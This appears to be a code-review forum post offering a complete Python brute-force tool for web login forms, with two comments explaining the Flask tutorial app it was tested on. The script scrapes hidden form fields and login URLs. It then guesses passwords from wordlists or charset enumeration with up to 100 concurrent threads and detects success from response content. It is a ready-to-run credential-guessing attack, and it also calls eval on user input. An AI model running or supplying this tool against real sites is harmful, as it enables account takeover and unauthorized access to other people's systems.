# Bruteforce web form

Tags: python, python-3.x

I've been testing login forms on a couple web applications (mostly 'flasky', developed on the O'Reilly book 'Flask Web Development'), developing a bruteforce Python script meanwhile. I have NOT mounted a real attack except on localhost, although parts of the script (NOT the concurrent connections) were tried against other websites.

The script uses forms' post method for login attempts through the `requests` library. 
It requires you to take username and password field names from a form's source beforehand. 
It will add hidden fields and use changing login URL's by making use of `bs4`. It can do word list (multiple) or search (using a chosen charset) attacks, verifying that a password was found by checking a value in a response's JSON or content plus asserting that the URL has changed and the status code is 200.

Several command line arguments allow it some degree of adaptation to a target.

```
from argparse import ArgumentParser
from itertools import islice, product, combinations, zip_longest
from string import ascii_lowercase, ascii_uppercase, digits, punctuation
from collections import OrderedDict
from time import sleep
from concurrent.futures import ThreadPoolExecutor, as_completed
from io import StringIO
from inspect import getgeneratorstate
from sys import argv, stdout

from bs4 import BeautifulSoup as Bs
from requests import Session, exceptions

from cfg import *

SOURCE = SOURCE_USR, SOURCE_PWD
_URL = URL.split('/')
HIDDEN = 'input', 'value', 'type', 'hidden', 'name'
DYNAMIC = 'form', 'action', 'method', 'post', 'method'
SLC = 100
EXC = StringIO()


def parse_command_line_arguments(args):
    parser = ArgumentParser()
    parser.add_argument(
        'fn',
        choices=('validate_json', 'validate_str', 'validate_url')
    )
    parser.add_argument(
        '-wl', dest='wl', nargs='*', default=[None],
        help='Word lists'
    )
    parser.add_argument(
        '-start', dest='start', type=int, default=8,
        choices=range(4, 13), help='Min pwd len'
    )
    parser.add_argument(
        '-stop', dest='stop', type=int, default=12,
        choices=range(4, 13), help='Max pwd len'
    )
    parser.add_argument(
        '-step', dest='step', type=int, default=2,
        help='Step between len\'s'
    )
    parser.add_argument(
        '-istart', dest='istart', type=int, default=0,
        help='Start at pwd N'
    )
    parser.add_argument(
        '-istop', dest='istop', type=int, default=None,
        help='Stop at pwd N'
    )
    parser.add_argument(
        '-key', dest='key', type=int, default=14,
        choices=range(0, 15), help='Charset'
    )
    parser.add_argument(
        '-max_workers', dest='max_workers', type=int, default=100,
        help='Max worker threads'
    )
    return parser.parse_args(args)


def wl_pwd_generator(filename, istart, istop, **_):
    with open(filename, 'r') as file:
        yield
        yield from islice(
            map(str.rstrip, file), istart, istop
        )


def use_wl_pwd_generator(args):
    generators = {
        wl_pwd_generator(wl, **vars(args)) for wl in args.wl
    }
    for gen in generators:
        next(gen)
    return generators


def choose_from_ch(key):
    charset = ascii_lowercase, ascii_uppercase, \
              digits, punctuation
    ch = {}
    count = 0
    for n in range(1, len(charset) + 1):
        for combination in combinations(charset, r=n):
            ch[count] = ''.join(combination)
            count += 1
    return ch[key]


def pwd_generator(ch, istart, istop, start, stop, step, **_):
    def mk(n):
        return (''.join(pwd) for pwd in islice(
            product(ch, repeat=n), istart, istop
        ))

    return set(map(mk, range(start, stop + 1, step)))


def use_pwd_generator(args):
    return pwd_generator(
        choose_from_ch(args.key), **vars(args)
    )


def yield_html_pairs(content, tag, value, t, v, name):
    for html in Bs(content, 'html.parser').find_all(tag):
        try:
            if bool(html[value]) and html[t] == v \
                    and html[name] not in SOURCE:
                yield html[name], html[value]
        except KeyError:
            pass


def add_hidden_fields(payload, content):
    for name, value in yield_html_pairs(content, *HIDDEN):
        payload[name] = value


def remove_duplicates_in_url(dynamic_url):
    removed = OrderedDict.fromkeys(
        _URL[1:] + dynamic_url.split('/')[1:]
    )
    return _URL[0] + '/' + '/'.join(removed)


def change_to_dynamic_url(_, content):
    for _, value in yield_html_pairs(content, *DYNAMIC):
        return remove_duplicates_in_url(value)
    return URL


def apply_changes(payload, content):
    add_hidden_fields(payload, content)
    return change_to_dynamic_url('', content)


def validate_response(fn):
    def deco(response):
        return fn(response) and response.url != URL \
               and response.status_code == 200

    return deco


@validate_response
def validate_json(response):
    return response.json()[JSON_KEY] == SUCCESS_VALUE


@validate_response
def validate_str(response):
    return SUCCESS_VALUE in response.content.decode()


@validate_response
def validate_url(_):
    return True


def attempt_login(pwd, fn):
    payload = {SOURCE_USR: USR, SOURCE_PWD: pwd}
    with Session() as session:
        content = session.get(URL).content.decode()
        dynamic_url = apply_changes(payload, content)
        response = session.post(dynamic_url, data=payload)
    return pwd if fn(response) else None


def err_handler(*args):
    for n in range(1, 11):
        try:
            return attempt_login(*args)
        except exceptions.ConnectionError:
            sleep(n)
    else:
        raise exceptions.ConnectionError('ConnectionError')


def concur_connect(slc, max_workers, fn):
    with ThreadPoolExecutor(max_workers=max_workers) as exe:
        fs = (
            exe.submit(err_handler, pwd, fn) for pwd in slc
        )
        yield from (
            future.result() for future in as_completed(fs)
        )


def slc_gen(gen, *args):
    try:
        yield from concur_connect(islice(gen, SLC), *args)
    except Exception as exc:
        EXC.write('\n[-] {}'.format(exc))
        gen.close()


def zip_generators(generators, *args):
    return map(set, zip_longest(
        *{slc_gen(gen, *args) for gen in generators}
    ))


def not_closed(gen):
    return getgeneratorstate(gen) != 'GEN_CLOSED'


def filter_not_closed(generators):
    return set(filter(not_closed, generators))


def probe(generators, *args):
    count = 0
    msg = '[*] Attempts per generator: {}\r'
    while generators:
        for res in zip_generators(generators, *args):
            count += 1
            count_msg = msg.format(count)
            try:
                res.remove(None)
                pwd = res.pop()
            except KeyError:
                stdout.write(count_msg)
            else:
                stdout.write(
                    count_msg.rstrip() + ' | Found: {}\r'.format(pwd)
                )
                return
        generators = filter_not_closed(generators)


def choose_generator(args):
    fn = eval(args.fn)
    max_workers = args.max_workers
    try:
        probe(use_wl_pwd_generator(args), max_workers, fn)
    except TypeError:
        probe(use_pwd_generator(args), max_workers, fn)
    except FileNotFoundError as exc:
        exit(exc)


def main(args):
    try:
        choose_generator(
            parse_command_line_arguments(args)
        )
    except KeyboardInterrupt:
        pass
    stdout.write(EXC.getvalue())


if __name__ == '__main__':
    main(argv[1:])
```

`cfg` looks like:

```
SOURCE_USR = 'email'
SOURCE_PWD = 'password'
URL = 'http://127.0.0.1:5000/auth/login'
USR = 'my_username'
JSON_KEY = ''
SUCCESS_VALUE = None
```

I'm unsure if this came out as a toy implementation.

Comment: Could you describe what "Miguel Grinberg's flasky" is? Any and all written details can help potential reviewers.

Comment: Miguel Grinberg's flasky is a web application developed in 'Flask Web Development', an O'Reilly book. It is an introduction to the Flask Python framework. If it's ok to post a link, you can find it here: https://github.com/miguelgrinberg/flasky